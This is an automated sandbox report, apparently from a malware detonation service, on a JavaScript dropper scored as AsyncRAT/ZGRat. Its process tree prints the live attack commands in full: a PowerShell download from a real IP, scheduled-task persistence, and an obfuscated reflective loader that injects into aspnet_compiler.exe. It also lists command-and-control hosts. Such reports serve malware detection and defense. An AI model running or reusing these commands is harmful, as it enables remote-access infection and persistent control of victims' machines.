asyncrat | 8550509a02f745f281a2a87c1f336b0fca32bd51c1074b281e5772e5c8a6ff60

Analysis

max time kernel
150s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20231127-en
resource tags

arch:x64arch:x86image:win10v2004-20231127-enlocale:en-usos:windows10-2004-x64system
submitted
07-12-2023 07:36

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

fb3c7a8f-e0ee-474d-918c-a9df0bbfe45c.js
Size

7KB
MD5

b2195fa1ea604007f7a3664e0e49f591
SHA1

915985302f8fb7f37d07d22a8ec5cb5e8005fb47
SHA256

8550509a02f745f281a2a87c1f336b0fca32bd51c1074b281e5772e5c8a6ff60
SHA512

478d9dcd9391a2e224bd291325dde58883d197d4cec1d989a3f054363dc03e19075e174058db828fbfc668cb76e2cd2b73782bbad3cd6a582383a62d37a8b977
SSDEEP

96:xBdMQYYVlVS+RwbkiEi3gkFmRePXywbkOEi3ckFmRePXuUxBbLDIX3FU3i:qQYYXVS+R9SgbEPihScbEP+cBb+3FGi

Score

10^/10

asyncrat zgrat js rat

Malware Config

Extracted

Language

ps1

Source

URLs

exe.dropper

http://23.145.120.49:249/js.jpg

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://nodejs.org/download/release/v6.17.1/win-x64/node.exe

Extracted

Family

asyncrat

Version

AWS | 3Losh

Botnet

wpmediatech.com:6606

wpmediatech.com:7707

wpmediatech.com:8808

Mutex

AsyncMutex_aloshx

Attributes

delay
3
install
false
install_folder
%AppData%

aes.plain

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat

Detect ZGRat V1 1 IoCs

Processes:

resource	yara_rule
behavioral2/memory/2356-115-0x0000019C7A4D0000-0x0000019C7A528000-memory.dmp	family_zgrat_v1

ZGRat
ZGRat is remote access trojan written in C#.
rat zgrat

Async RAT payload 1 IoCs

rat

Processes:

resource	yara_rule
behavioral2/memory/5092-116-0x0000000000400000-0x0000000000416000-memory.dmp	asyncrat

Downloads MZ/PE file

Checks computer location settings 2 TTPs 6 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

wscript.exeWScript.execmd.exeWScript.exeWScript.exeWScript.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-3635043082-2972811465-3176142135-1000\Control Panel\International\Geo\Nation	wscript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3635043082-2972811465-3176142135-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3635043082-2972811465-3176142135-1000\Control Panel\International\Geo\Nation	cmd.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3635043082-2972811465-3176142135-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3635043082-2972811465-3176142135-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3635043082-2972811465-3176142135-1000\Control Panel\International\Geo\Nation	WScript.exe

Suspicious use of SetThreadContext 1 IoCs

Processes:

powershell.exe

description pid process target process

PID 2356 set thread context of 5092 2356 powershell.exe aspnet_compiler.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Modifies registry class 1 IoCs

Processes:

cmd.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-3635043082-2972811465-3176142135-1000_Classes\Local Settings cmd.exe
Runs net.exe

description	pid	process	target process
PID 2356 set thread context of 5092	2356	powershell.exe	aspnet_compiler.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3635043082-2972811465-3176142135-1000_Classes\Local Settings	cmd.exe

Suspicious behavior: EnumeratesProcesses 21 IoCs

Processes:

powershell.exepowershell.exenode.exenode.exepowershell.exepowershell.exeaspnet_compiler.exenode.exepowershell.exe

pid	process
3484	powershell.exe
3484	powershell.exe
1780	powershell.exe
1780	powershell.exe
1780	powershell.exe
688	node.exe
1528	node.exe
688	node.exe
1528	node.exe
2356	powershell.exe
2356	powershell.exe
3784	powershell.exe
3784	powershell.exe
3784	powershell.exe
2356	powershell.exe
5092	aspnet_compiler.exe
5092	aspnet_compiler.exe
1336	node.exe
1336	node.exe
4572	powershell.exe
4572	powershell.exe

Suspicious use of AdjustPrivilegeToken 6 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exeaspnet_compiler.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	3484	powershell.exe
Token: SeDebugPrivilege	1780	powershell.exe
Token: SeDebugPrivilege	2356	powershell.exe
Token: SeDebugPrivilege	3784	powershell.exe
Token: SeDebugPrivilege	5092	aspnet_compiler.exe
Token: SeDebugPrivilege	4572	powershell.exe

Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

aspnet_compiler.exe

pid process

5092 aspnet_compiler.exe

pid	process
5092	aspnet_compiler.exe

Suspicious use of WriteProcessMemory 42 IoCs

Processes:

wscript.exepowershell.exeWScript.exenet.execmd.exeWScript.exeWScript.exenode.exenode.execmd.execmd.exepowershell.exeWScript.exenode.execmd.exe

description	pid	process	target process
PID 5108 wrote to memory of 3484	5108	wscript.exe	powershell.exe
PID 5108 wrote to memory of 3484	5108	wscript.exe	powershell.exe
PID 3484 wrote to memory of 4316	3484	powershell.exe	WScript.exe
PID 3484 wrote to memory of 4316	3484	powershell.exe	WScript.exe
PID 4316 wrote to memory of 3616	4316	WScript.exe	net.exe
PID 4316 wrote to memory of 3616	4316	WScript.exe	net.exe
PID 3616 wrote to memory of 2484	3616	net.exe	net1.exe
PID 3616 wrote to memory of 2484	3616	net.exe	net1.exe
PID 4316 wrote to memory of 4924	4316	WScript.exe	cmd.exe
PID 4316 wrote to memory of 4924	4316	WScript.exe	cmd.exe
PID 4924 wrote to memory of 1780	4924	cmd.exe	powershell.exe
PID 4924 wrote to memory of 1780	4924	cmd.exe	powershell.exe
PID 4924 wrote to memory of 5092	4924	cmd.exe	WScript.exe
PID 4924 wrote to memory of 5092	4924	cmd.exe	WScript.exe
PID 4924 wrote to memory of 3036	4924	cmd.exe	WScript.exe
PID 4924 wrote to memory of 3036	4924	cmd.exe	WScript.exe
PID 3036 wrote to memory of 688	3036	WScript.exe	node.exe
PID 3036 wrote to memory of 688	3036	WScript.exe	node.exe
PID 5092 wrote to memory of 1528	5092	WScript.exe	node.exe
PID 5092 wrote to memory of 1528	5092	WScript.exe	node.exe
PID 688 wrote to memory of 1488	688	node.exe	cmd.exe
PID 688 wrote to memory of 1488	688	node.exe	cmd.exe
PID 1528 wrote to memory of 3884	1528	node.exe	cmd.exe
PID 1528 wrote to memory of 3884	1528	node.exe	cmd.exe
PID 1488 wrote to memory of 2356	1488	cmd.exe	powershell.exe
PID 1488 wrote to memory of 2356	1488	cmd.exe	powershell.exe
PID 3884 wrote to memory of 3784	3884	cmd.exe	powershell.exe
PID 3884 wrote to memory of 3784	3884	cmd.exe	powershell.exe
PID 2356 wrote to memory of 5092	2356	powershell.exe	aspnet_compiler.exe
PID 2356 wrote to memory of 5092	2356	powershell.exe	aspnet_compiler.exe
PID 2356 wrote to memory of 5092	2356	powershell.exe	aspnet_compiler.exe
PID 2356 wrote to memory of 5092	2356	powershell.exe	aspnet_compiler.exe
PID 2356 wrote to memory of 5092	2356	powershell.exe	aspnet_compiler.exe
PID 2356 wrote to memory of 5092	2356	powershell.exe	aspnet_compiler.exe
PID 2356 wrote to memory of 5092	2356	powershell.exe	aspnet_compiler.exe
PID 2356 wrote to memory of 5092	2356	powershell.exe	aspnet_compiler.exe
PID 1992 wrote to memory of 1336	1992	WScript.exe	node.exe
PID 1992 wrote to memory of 1336	1992	WScript.exe	node.exe
PID 1336 wrote to memory of 4920	1336	node.exe	cmd.exe
PID 1336 wrote to memory of 4920	1336	node.exe	cmd.exe
PID 4920 wrote to memory of 4572	4920	cmd.exe	powershell.exe
PID 4920 wrote to memory of 4572	4920	cmd.exe	powershell.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\fb3c7a8f-e0ee-474d-918c-a9df0bbfe45c.js
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:5108

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Start-BitsTransfer -Source 'http://23.145.120.49:249/js.jpg' -Destination 'C:\Users\Public\zip.zip'; Expand-Archive -Path 'C:\Users\Public\zip.zip' -DestinationPath 'C:\Users\Public\' -Force;Remove-Item C:\Users\Public\zip.zip; C:\Users\Public\brave.vbs
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3484

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Public\brave.vbs"
3⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4316

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" session
4⤵
- Suspicious use of WriteProcessMemory
PID:3616

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 session
5⤵
PID:2484

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Public\node.bat" "
4⤵
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:4924

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PowerShell -Command "Start-BitsTransfer -Source 'https://nodejs.org/download/release/v6.17.1/win-x64/node.exe' -Destination 'C:\Users\Public\node.exe'"
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1780

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Public\shell.js"
5⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:5092

C:\Users\Public\node.exe
"C:\Users\Public\node.exe" C:\Users\Public\install.js
6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1528

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /s /c "powershell.exe -c $tr = New-Object -ComObject Schedule.Service;$tr.Connect();$ta = $tr.NewTask(0);$ta.RegistrationInfo.Description = 'Runs a script every 2 minutes';$ta.Settings.Enabled = $true;$ta.Settings.DisallowStartIfOnBatteries = $false;$st = $ta.Triggers.Create(1);$st.StartBoundary = [DateTime]::Now.ToString('yyyy-MM-ddTHH:mm:ss');$st.Repetition.Interval = 'PT2M';$md = $ta.Actions.Create(0);$md.Path = 'C:\Users\Public\app.js';$ns = $tr.GetFolder('\');$ns.RegisterTaskDefinition('Media', $ta, 6, $null, $null, 3);"
7⤵
- Suspicious use of WriteProcessMemory
PID:3884

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -c $tr = New-Object -ComObject Schedule.Service;$tr.Connect();$ta = $tr.NewTask(0);$ta.RegistrationInfo.Description = 'Runs a script every 2 minutes';$ta.Settings.Enabled = $true;$ta.Settings.DisallowStartIfOnBatteries = $false;$st = $ta.Triggers.Create(1);$st.StartBoundary = [DateTime]::Now.ToString('yyyy-MM-ddTHH:mm:ss');$st.Repetition.Interval = 'PT2M';$md = $ta.Actions.Create(0);$md.Path = 'C:\Users\Public\app.js';$ns = $tr.GetFolder('\');$ns.RegisterTaskDefinition('Media', $ta, 6, $null, $null, 3);
8⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3784

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Public\app.js"
5⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3036

C:\Users\Public\node.exe
"C:\Users\Public\node.exe" C:\Users\Public\run.js
6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:688

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /s /c "powershell.exe -Command "Function OF([String] $Jxxxe) {$JS = [System.Collections.Generic.List[Byte]]::new();for ($i = 0; $i -lt $Jxxxe.Length; $i +=8) {$JS.Add([Convert]::ToByte($Jxxxe.Substring($i, 8), 2));}return [System.Text.Encoding]::ASCII.GetString($JS.ToArray());}Function User {param($x3losh)$x3losh = $x3losh -split '(..)' | ? { $_ };ForEach ($JSEYHESSS325 in $x3losh){[Convert]::ToInt32($JSEYHESSS325,16);}}$Jxxxe = (Get-Content -Path 'C:\Users\Public\msg.dll' -Raw) -replace '%','0' -replace '!','1' -replace '@','A';$geGWHZ = (Get-Content -Path 'C:\Users\Public\runpe.dll' -Raw) -replace '%','0' -replace '!','1' -replace '@','A';$load = (Get-Content -Path 'C:\Users\Public\load.dll');$type = (Get-Content -Path 'C:\Users\Public\type.dll');$new1 = OF(Get-Content -Path 'C:\Users\Public\xx.dll');$method = (Get-Content -Path 'C:\Users\Public\method.dll');$wex = OF(Get-Content -Path 'C:\Users\Public\Execute.dll');$invoke = (Get-Content -Path 'C:\Users\Public\invoke.dll');$Framework = OF(Get-Content -Path 'C:\Users\Public\Framework.dll');$i = 0;while ($true) {; try {;[Byte[]]$JR = User $Jxxxe;[Byte[]]$Coment = User $geGWHZ; break; } catch {; };};[Reflection.Assembly]::$load($Coment).$type($new1).$method($wex).$invoke($null,[object[]] ($Framework,$null,$JR,$true));""
7⤵
- Suspicious use of WriteProcessMemory
PID:1488

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -Command "Function OF([String] $Jxxxe) {$JS = [System.Collections.Generic.List[Byte]]::new();for ($i = 0; $i -lt $Jxxxe.Length; $i +=8) {$JS.Add([Convert]::ToByte($Jxxxe.Substring($i, 8), 2));}return [System.Text.Encoding]::ASCII.GetString($JS.ToArray());}Function User {param($x3losh)$x3losh = $x3losh -split '(..)' | ? { $_ };ForEach ($JSEYHESSS325 in $x3losh){[Convert]::ToInt32($JSEYHESSS325,16);}}$Jxxxe = (Get-Content -Path 'C:\Users\Public\msg.dll' -Raw) -replace '%','0' -replace '!','1' -replace '@','A';$geGWHZ = (Get-Content -Path 'C:\Users\Public\runpe.dll' -Raw) -replace '%','0' -replace '!','1' -replace '@','A';$load = (Get-Content -Path 'C:\Users\Public\load.dll');$type = (Get-Content -Path 'C:\Users\Public\type.dll');$new1 = OF(Get-Content -Path 'C:\Users\Public\xx.dll');$method = (Get-Content -Path 'C:\Users\Public\method.dll');$wex = OF(Get-Content -Path 'C:\Users\Public\Execute.dll');$invoke = (Get-Content -Path 'C:\Users\Public\invoke.dll');$Framework = OF(Get-Content -Path 'C:\Users\Public\Framework.dll');$i = 0;while ($true) {; try {;[Byte[]]$JR = User $Jxxxe;[Byte[]]$Coment = User $geGWHZ; break; } catch {; };};[Reflection.Assembly]::$load($Coment).$type($new1).$method($wex).$invoke($null,[object[]] ($Framework,$null,$JR,$true));"
8⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2356

C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
9⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:5092

C:\Windows\System32\WScript.exe
C:\Windows\System32\WScript.exe "C:\Users\Public\app.js"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1992

C:\Users\Public\node.exe
"C:\Users\Public\node.exe" C:\Users\Public\run.js
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1336

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /s /c "powershell.exe -Command "Function OF([String] $Jxxxe) {$JS = [System.Collections.Generic.List[Byte]]::new();for ($i = 0; $i -lt $Jxxxe.Length; $i +=8) {$JS.Add([Convert]::ToByte($Jxxxe.Substring($i, 8), 2));}return [System.Text.Encoding]::ASCII.GetString($JS.ToArray());}Function User {param($x3losh)$x3losh = $x3losh -split '(..)' | ? { $_ };ForEach ($JSEYHESSS325 in $x3losh){[Convert]::ToInt32($JSEYHESSS325,16);}}$Jxxxe = (Get-Content -Path 'C:\Users\Public\msg.dll' -Raw) -replace '%','0' -replace '!','1' -replace '@','A';$geGWHZ = (Get-Content -Path 'C:\Users\Public\runpe.dll' -Raw) -replace '%','0' -replace '!','1' -replace '@','A';$load = (Get-Content -Path 'C:\Users\Public\load.dll');$type = (Get-Content -Path 'C:\Users\Public\type.dll');$new1 = OF(Get-Content -Path 'C:\Users\Public\xx.dll');$method = (Get-Content -Path 'C:\Users\Public\method.dll');$wex = OF(Get-Content -Path 'C:\Users\Public\Execute.dll');$invoke = (Get-Content -Path 'C:\Users\Public\invoke.dll');$Framework = OF(Get-Content -Path 'C:\Users\Public\Framework.dll');$i = 0;while ($true) {; try {;[Byte[]]$JR = User $Jxxxe;[Byte[]]$Coment = User $geGWHZ; break; } catch {; };};[Reflection.Assembly]::$load($Coment).$type($new1).$method($wex).$invoke($null,[object[]] ($Framework,$null,$JR,$true));""
3⤵
- Suspicious use of WriteProcessMemory
PID:4920

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -Command "Function OF([String] $Jxxxe) {$JS = [System.Collections.Generic.List[Byte]]::new();for ($i = 0; $i -lt $Jxxxe.Length; $i +=8) {$JS.Add([Convert]::ToByte($Jxxxe.Substring($i, 8), 2));}return [System.Text.Encoding]::ASCII.GetString($JS.ToArray());}Function User {param($x3losh)$x3losh = $x3losh -split '(..)' | ? { $_ };ForEach ($JSEYHESSS325 in $x3losh){[Convert]::ToInt32($JSEYHESSS325,16);}}$Jxxxe = (Get-Content -Path 'C:\Users\Public\msg.dll' -Raw) -replace '%','0' -replace '!','1' -replace '@','A';$geGWHZ = (Get-Content -Path 'C:\Users\Public\runpe.dll' -Raw) -replace '%','0' -replace '!','1' -replace '@','A';$load = (Get-Content -Path 'C:\Users\Public\load.dll');$type = (Get-Content -Path 'C:\Users\Public\type.dll');$new1 = OF(Get-Content -Path 'C:\Users\Public\xx.dll');$method = (Get-Content -Path 'C:\Users\Public\method.dll');$wex = OF(Get-Content -Path 'C:\Users\Public\Execute.dll');$invoke = (Get-Content -Path 'C:\Users\Public\invoke.dll');$Framework = OF(Get-Content -Path 'C:\Users\Public\Framework.dll');$i = 0;while ($true) {; try {;[Byte[]]$JR = User $Jxxxe;[Byte[]]$Coment = User $geGWHZ; break; } catch {; };};[Reflection.Assembly]::$load($Coment).$type($new1).$method($wex).$invoke($null,[object[]] ($Framework,$null,$JR,$true));"
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4572

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
e5ab5d093e49058a43f45f317b401e68

SHA1
120da069a87aa9507d2b66c07e368753d3061c2d

SHA256
4ec6d8e92ffc5b2a0db420e2d031a2226eef582d5e56d5088fc91bba77288e74

SHA512
d44361457713abd28c49f9aa4043b76882e2b5e626816267cf3d79454c48980ba6207333f23b7976b714e090c658db36a844cb27cd6a91615014f3b06ef5623a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
53a16bd4fae6ff5468b1b806bc3d8597

SHA1
d4b172256bb153f3841182e4d920ace83fa9ba86

SHA256
c6e81d04987055f3951a4fdc25aca6cb35ae1d15cb29a1855c9a9729fdeb90f4

SHA512
e55187b6b43773da81b55895bc6d5c4c7bf4a1fa25aa7082b71089100ba0fbcf1056d1fda38be7ed53daf7f342c00693571d23feedf9464135f6dd2b34f79f75

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
53a16bd4fae6ff5468b1b806bc3d8597

SHA1
d4b172256bb153f3841182e4d920ace83fa9ba86

SHA256
c6e81d04987055f3951a4fdc25aca6cb35ae1d15cb29a1855c9a9729fdeb90f4

SHA512
e55187b6b43773da81b55895bc6d5c4c7bf4a1fa25aa7082b71089100ba0fbcf1056d1fda38be7ed53daf7f342c00693571d23feedf9464135f6dd2b34f79f75

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
2KB

MD5
566486bdfc4ae19b930457f84129648b

SHA1
dbbb5e138fa06990856de4f619ce0023893761b6

SHA256
ba71c91a5080eb13d9655c8dc5e86b088af1648ae724820976c4fd43ba77ad9e

SHA512
f645a619a1b9fdba593e308c36120a230eb934dcf465ce188572976f8c2f54e19c9c9d11973eaf710523b7b6979f8914dbc0123129d35ff6369096a01cf9470b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
1e110e48715b42041cf2cc94c3f0e7c2

SHA1
481fa36e08ecdbab12de3bee11bccecee87665e1

SHA256
79315360ff2719a01272da351cbc3eb1f38218a14a2aa32ed3864207468ccc3c

SHA512
f336ab0449caf65dc8bcdb5a73746dd901673d29f1ef60789a2e2232123c8a33e28ffd7d4d92d39f44739fdf008a8d91249144e0224e2816d28ecbc822c1ee82

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_0w13rlsw.034.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Public\Execute.dll

Filesize
56B

MD5
529cf04db0f736467c7583ea80c3aa66

SHA1
7628148337b1d3d700c8151f76a1595b6f5123b8

SHA256
67642e56281bc4aa846689bc725f8fcc76e61c20831aa4f7e2e0c8cdba17e520

SHA512
f612b12e1a7c2021f6c2723fe57f23aba3d1b6588f080dd67e48dc44eeaf88455e4bc6bf9caed088c63c3fb019ad8696eeb44e7bb09f8c81638779f4658ef6d4

Download Submit
C:\Users\Public\Framework.dll

Filesize
520B

MD5
6a08392ecf95df7fc91917dcfaae8da6

SHA1
480f6a5c761e1a069c0d68f5ac2aabf727791393

SHA256
0a572ee5508d9310936801a04237d56f118dff4dbaa98f60070988cc4b8ca460

SHA512
d70c436183a9c6f6d4ce9296dce846f94cd12d7fbb76b24e59d88a77349a95a7a0d6ad8f9f4ffc32a98618b3250e0d35e4cf9ff1e711f4e63ffee425597dfc5e

Download Submit
C:\Users\Public\app.js

Filesize
353B

MD5
a307c4557d5fdf209e1b38a803e03b52

SHA1
14e00c86caadf2ed0949dc7a3f6bffbb5b9cd0fa

SHA256
3a16f15174757a5f84ae743db042b62b2554620118de63be2e7086827f114bf5

SHA512
2c6ad68b4bfe3cd0260712da43a48f1e9b0d60d555be80560a892fb21617061f4efa02c3bb078fb0f02fdd432c48afb88e5f5ec9a05fb82124face2a27a3ac66

Download Submit
C:\Users\Public\brave.vbs

Filesize
2KB

MD5
8c2bd49f41e4a825fc7f030bb38143f6

SHA1
290b7da6cdd513b6d06deca81c288fa6f8a92b1f

SHA256
2b58d54f0620f94e37f97ef5d4281b9ba50e171fd542967f22a3053096315b03

SHA512
1d6dcbf178c4ed4f60e99b8555f2c420e550e1bb91777a4ce1f01ce2d801d964ced6ff0ca74972370b150f31d63624788380448732b50ce9ec7e58c64c3aa17d

Download Submit
C:\Users\Public\install.js

Filesize
796B

MD5
5727e0cb34eac044ea5495b99b7a2f8c

SHA1
6b99de1c9f92718e0053645c2e597d745f23ae34

SHA256
633dc94e7d8e997438a21ac12d05ef1614f7ef8b3df815ea19041880dd0ad8d9

SHA512
300fa4ce3943279b7eff9dd844e8713a1d3a414f6217d881158181440bb187f16715fc494134dc584c826ead713a8d8f9a0f4ff1e17b2b37aef09e88c5ea603b

Download Submit
C:\Users\Public\invoke.dll

Filesize
6B

MD5
b9376e9e3c4d48f5e35a3f355ae1f74a

SHA1
c65605adf5270f5065089b0189da542274d30db0

SHA256
90092e5fb861dd4ff34fa20f4b31ca44ebbb3bc367a8d7a35b89a7f89c793fa9

SHA512
5560101edb289c4a86476bce55648324ef188ff1e2d879a1a3bc10c1298aa643255c35d16a984f30d624fe9a87306304eaa14179863001ddd6e264e8bba17591

Download Submit
C:\Users\Public\load.dll

Filesize
4B

MD5
f19dbf2edb3a0bd74b0524d960ff21eb

SHA1
ddcb77ff769ea54ca622848f6bedd4004fa4f4fa

SHA256
8a6bdb6b18da586fe7f2acbd8f1055533f2cd97a3681b3652bcd712224df45c3

SHA512
f0419117db6330f52eba6e7ef08a5cb096fdb02a40b1dfe4f28dd57791a11b6753e4db0fb63e1c4a22293584dc61908a8e2e99dc59a07f805e097c723329d216

Download Submit
C:\Users\Public\method.dll

Filesize
9B

MD5
38b97710070dbdd7b3359c0d52da4a72

SHA1
4ce08d2147c514f9c8e1f83d384369ec8986bc3b

SHA256
675f06af4e7f254d55ac605bbd7da45d9e00207a97f8a8ab7bb747d512776bc7

SHA512
b11cec0f21dec871163d6c254850d3f807ecc4ae726b143a0c4667a25c3a3fe9283aee3f6850a2389fdce3d20f41d9c3d30f4768171137d6bdc1355a2116189c

Download Submit
C:\Users\Public\msg.dll

Filesize
129KB

MD5
6582381682a8618da150ce6c3de6a227

SHA1
0f34186a7fc3519005dcc369aab22a109ba8f2da

SHA256
b1805c2c47cb2734111e8b03b3e305de22c4c3149fb3dff96c869df59d806e9e

SHA512
338b76b56fb4aa89d485f1519942fd1ab09facd5f6e06d92c1038bc53cfc389514b98065ad5ded74c1eada98d0950f218d17bab0ca2b0d4cb1ece71c9b467bdc

Download Submit
C:\Users\Public\node.bat

Filesize
604B

MD5
48e50f8d07d71b99772fcaff006ff53e

SHA1
ae7caa69a56d643466003567d1560ca369bcec37

SHA256
360eb0a4b12c48059e0b58994bf42d9525a6cba97f6b8f4dc70fbbcfa4792957

SHA512
1a6fb38519a7181c20fd2465945e8dd01057ad8a223362fa8af73f91e7a079ca34ca9b76787d92ba733f02ea795a8cddacc93e33af32fe8f51a548bdec5e2438

Download Submit
C:\Users\Public\run.js

Filesize
8KB

MD5
9840c805e56a4b32437e7985520eda6c

SHA1
360d4fdc697375269b509304cb8f3ffa52df524a

SHA256
ae5af88d556975ffb39af6c7d12da330de39a7eaaf65f6fd9c9414253e0f5334

SHA512
01f7d8ecb5c7d516763825c071aeb9ca786bcd686765cfb789df23a26c6b914dec259fa03a1ab190fb33a0af3e35b4c7afe11c8e9cf0d469818bdf331f6c3d67

Download Submit
C:\Users\Public\runpe.dll

Filesize
656KB

MD5
3afb403063fe1faf571332a4afcf238c

SHA1
7db1273349ddc765ccaa15c97148a849d3a300f8

SHA256
66980cc688f22905fcb2d034bec4777d71f8fdd30beceb4dac7a71bf7f6abeed

SHA512
50d975edec1ca36d817371e6dbe3e4020537d4c86076c1ba2cfd434c0bf136d0004a44bd3182a79a80bfb1da2c6eae20e5aecd1a22a6c220bb4dd76755e1ef8a

Download Submit
C:\Users\Public\shell.js

Filesize
182B

MD5
d71e2d55ee0534b06313f71aefd921b9

SHA1
6c7713299bdcb1cc4046b7612775c24ddf68ad82

SHA256
43bdd5e0b846271a4bae3a4f74c8310b914497abd2ffe0e1886ec9fec9f25ecd

SHA512
6e5f222fa12d4dad713d5e8dd6a443d09ba5f715fa8701b5b26edf0f1ae8204d65eb560b003dfbc5b2f240079dc2c4eb06b9c2245de24338fa9a5c80647eb536

Download Submit
C:\Users\Public\type.dll

Filesize
7B

MD5
be784e48d0174367297b636456c7bcf1

SHA1
8c906d9e0e2439238b3263e087aee3d98fa86dea

SHA256
510760f4c6f7fb3b5b332cd7d3a2f674235b0f58d77dbc3972adaf682a168136

SHA512
aed58d8904742a672f9ba339069004a1c0339e6481a8949de14ee8bf2afef43f8e18e55ba4a6854a7950ee355675c26b46120e500472deaf0986f68451442ae4

Download Submit
C:\Users\Public\xx.dll

Filesize
72B

MD5
14c2a6b7bf15e15d8dae9cd4a56432d5

SHA1
0d00aa5d547ea7e6f7283221e5f3b0cc91cc6016

SHA256
79891821778c4ca9358c27e7fb66b0442a2921b661df1293e398b18d81da5d96

SHA512
e476851faf540c3679225de2b224d64d117fa1857a4db7b34714d0154b8ba5ebaab50e1a6b0578759b7572e89e3df4d0d4112a7e4f5b81230931cfe6b651c63d

Download Submit
\??\PIPE\srvsvc

MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
memory/1780-57-0x0000026671C90000-0x0000026671CA0000-memory.dmp

Filesize
64KB

Download
memory/1780-56-0x0000026671C90000-0x0000026671CA0000-memory.dmp

Filesize
64KB

Download
memory/1780-68-0x0000026671C30000-0x0000026671C56000-memory.dmp

Filesize
